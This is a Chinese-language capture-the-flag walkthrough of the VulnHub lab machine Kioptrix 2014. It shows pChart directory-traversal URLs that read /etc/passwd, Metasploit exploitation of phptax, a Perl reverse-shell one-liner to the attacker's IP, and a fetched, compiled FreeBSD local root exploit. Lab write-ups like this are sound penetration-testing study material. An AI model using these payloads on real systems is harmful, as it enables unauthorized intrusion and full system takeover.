OSCP难度靶机之Kioptrix: 2014

admin 2022年5月3日22:33:35安全文章评论7 views1611字阅读5分22秒阅读模式

虚拟机信息

虚拟机下载地址:https://www.vulnhub.com/entry/kioptrix-2014-5,62/

虚拟机简介:开虚拟机电源之前,建议移除网卡并重新添加

目标:1个flag

级别:中级

1、主机探测

1、通过netdiscover检测主机IP地址

arp-scan 192.168.207.0/24

OSCP难度靶机之Kioptrix: 2014

2、服务探测

1、通过nmap进行端口扫描

nmap -A -sS -sV -v -p- 192.168.207.136

查看开放22、80、8080端口

OSCP难度靶机之Kioptrix: 2014

3、渗透测试

3.1 HTTP渗透

1.访问站点信息如下

访问80端口页面未发现有用信息

OSCP难度靶机之Kioptrix: 2014

2.查看网页源代码

提示可以访问隐藏页面

OSCP难度靶机之Kioptrix: 2014

查看访问站点信息

OSCP难度靶机之Kioptrix: 2014

3.搜索站点漏洞

searchsploit pchart 2.1.3

OSCP难度靶机之Kioptrix: 2014

查看漏洞详情,可以目录遍历

searchsploit -x php/webapps/31173

OSCP难度靶机之Kioptrix: 2014

4.查看/etc/passwd文件

http://192.168.207.136/pChart2.1.3/examples/index.php?Action=View&Script=/etc/passwd

获取到操作系统版本为FreeBSD9

OSCP难度靶机之Kioptrix: 2014

5.查看Apache默认配置

http://192.168.207.136/pChart2.1.3/examples/index.php?Action=View&Script=/usr/local/etc/apache22/httpd.conf

查看8080端口只允许User-Agent Mozilla/4.0版本访问

OSCP难度靶机之Kioptrix: 2014

6.访问站点

使用浏览器插件User-Agent Switcher and Manager,修改User-Agent

OSCP难度靶机之Kioptrix: 2014

查看可以正常打开网页

OSCP难度靶机之Kioptrix: 2014

查看网页信息

OSCP难度靶机之Kioptrix: 2014

7.搜索站点应用漏洞

查看网页源代码获取到应用信息,该应用在2003年发布

OSCP难度靶机之Kioptrix: 2014

基于搜索查看发现发布的版本信息,包括2002.0.8和2002.0.7

OSCP难度靶机之Kioptrix: 2014

OSCP难度靶机之Kioptrix: 2014

8.使用searchsploit搜索

searchsploit phptax

其中发现有MSF的利用脚本

OSCP难度靶机之Kioptrix: 2014

9.使用MSF进行利用

use exploit/multi/http/phptax_exec
set rhosts 192.168.207.136
set rport 8080
set UserAgent Mozilla/4.0
set payload cmd/unix/reverse
set lhost 192.168.207.130
run

成功获取到shell连接

OSCP难度靶机之Kioptrix: 2014

OSCP难度靶机之Kioptrix: 2014

3.2 系统渗透

1.使用perl进行反弹shell

测试发下主机未安装python,只安装perl语言

perl -e 'use Socket;$i="192.168.207.130";$p=5555;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

OSCP难度靶机之Kioptrix: 2014

2.查看系统版本

uname -a

OSCP难度靶机之Kioptrix: 2014

3.搜索系统相关漏洞

searchsploit freebsd 9.0

OSCP难度靶机之Kioptrix: 2014

4.查看安装软件

which gcc curl wget fetch

查看主机上没有安装curl和wget,可以通过fetch进行下载

OSCP难度靶机之Kioptrix: 2014

5.创建简单http

cp /usr/share/exploitdb/exploits/freebsd/local/26368.c ./
python -m http.server 8080

OSCP难度靶机之Kioptrix: 2014

6.下载文件

cd /tmp
fetch http://192.168.207.130:8080/26368.c
gcc 26368.c -o shell
./shell

OSCP难度靶机之Kioptrix: 2014

7.查看flag信息

cd /root
cat congrats.txt

OSCP难度靶机之Kioptrix: 2014

原文始发于微信公众号(安全孺子牛):OSCP难度靶机之Kioptrix: 2014

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月3日22:33:35
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  OSCP难度靶机之Kioptrix: 2014 http://cn-sec.com/archives/971051.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: